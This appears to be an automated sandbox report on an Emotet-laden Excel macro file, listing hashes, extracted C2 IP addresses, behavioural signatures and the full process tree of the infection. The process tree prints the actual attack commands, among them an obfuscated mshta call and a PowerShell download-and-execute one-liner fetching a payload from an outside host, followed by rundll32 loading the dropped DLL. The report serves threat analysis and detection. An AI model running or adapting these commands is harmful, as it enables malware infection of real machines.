Analysis
-
max time kernel
151s -
max time network
146s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20-01-2022 05:55
Behavioral task
behavioral1
Sample
1b8a7503b95b685e1c29207ac2a9a9d75b188abfc9c492e670eb365377c1ad90.xlsm
Resource
win10-en-20211208
General
-
Target
1b8a7503b95b685e1c29207ac2a9a9d75b188abfc9c492e670eb365377c1ad90.xlsm
-
Size
115KB
-
MD5
88646a07a6dfa5ad4701c778b50707a4
-
SHA1
c406856081490e6b55bfebf099d9541bc400ac77
-
SHA256
1b8a7503b95b685e1c29207ac2a9a9d75b188abfc9c492e670eb365377c1ad90
-
SHA512
85c65de8396b5c8ae7e7bfd9f088bb001fef5f339c32c139fd86cc7ac5c822b80cabc2f7eff102c94b1ab9bfbab69afe013836f4c5b305a26852075c4393e85c
Malware Config
Extracted
http://0x5cff39c3/sec/se1.html
Extracted
http://92.255.57.195/sec/se1.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1412 676 cmd.exe 68 -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
flow pid Process 35 1408 mshta.exe 37 3172 powershell.exe 39 3172 powershell.exe 48 4088 rundll32.exe 49 4088 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
pid Process 520 rundll32.exe 1208 rundll32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Fhanxxxpxmhoz\yqzblmorpao.cak rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2128 1408 WerFault.exe 74 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 676 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 3172 powershell.exe 3172 powershell.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 2128 WerFault.exe 3172 powershell.exe 4088 rundll32.exe 4088 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 2128 WerFault.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE 676 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 676 wrote to memory of 3068 676 EXCEL.EXE 71 PID 676 wrote to memory of 3068 676 EXCEL.EXE 71 PID 676 wrote to memory of 1412 676 EXCEL.EXE 72 PID 676 wrote to memory of 1412 676 EXCEL.EXE 72 PID 1412 wrote to memory of 1408 1412 cmd.exe 74 PID 1412 wrote to memory of 1408 1412 cmd.exe 74 PID 1408 wrote to memory of 3172 1408 mshta.exe 76 PID 1408 wrote to memory of 3172 1408 mshta.exe 76 PID 3172 wrote to memory of 1076 3172 powershell.exe 79 PID 3172 wrote to memory of 1076 3172 powershell.exe 79 PID 1076 wrote to memory of 520 1076 cmd.exe 80 PID 1076 wrote to memory of 520 1076 cmd.exe 80 PID 1076 wrote to memory of 520 1076 cmd.exe 80 PID 520 wrote to memory of 1208 520 rundll32.exe 81 PID 520 wrote to memory of 1208 520 rundll32.exe 81 PID 520 wrote to memory of 1208 520 rundll32.exe 81 PID 1208 wrote to memory of 2692 1208 rundll32.exe 84 PID 1208 wrote to memory of 2692 1208 rundll32.exe 84 PID 1208 wrote to memory of 2692 1208 rundll32.exe 84 PID 2692 wrote to memory of 4088 2692 rundll32.exe 85 PID 2692 wrote to memory of 4088 2692 rundll32.exe 85 PID 2692 wrote to memory of 4088 2692 rundll32.exe 85
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1b8a7503b95b685e1c29207ac2a9a9d75b188abfc9c492e670eb365377c1ad90.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:3068
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fhanxxxpxmhoz\yqzblmorpao.cak",dkvKoEcVaxoF8⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Fhanxxxpxmhoz\yqzblmorpao.cak",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4088
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1408 -s 16604⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
-